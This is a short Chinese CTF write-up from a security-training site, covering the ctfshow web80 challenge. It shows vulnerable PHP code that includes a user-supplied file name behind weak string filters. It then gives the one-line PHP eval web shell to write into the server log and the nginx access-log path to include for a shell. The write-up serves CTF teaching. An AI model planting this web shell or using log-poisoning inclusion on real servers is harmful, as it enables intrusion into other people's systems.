当前位置:天云网络培训 > 学习专栏 > CTF > 文件包含:包含日志完成getshell

文件包含:包含日志完成getshell

ctfshow:web80

题目:

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

 

 

如果你的命令是一句话就完成了getshell:

<?php @eval($_POST['pwd']) ?>

日志路径:

?file=/var/log/nginx/access.log

Tips:鼠标经过代码时会出现工具栏,工具栏上方有一键复制代码的功能哦~天云网络培训,专注于网络空间安全相关培训,并提供相关课程的在线培训 报名微信 tyedu1
天云网络培训 » 文件包含:包含日志完成getshell
讲师:Miracle

讲师:Miracle 学员

分享到:

相关推荐

提供专业、易懂、平民化教育。让每个热爱网络的人有个归宿

立即查看 了解详情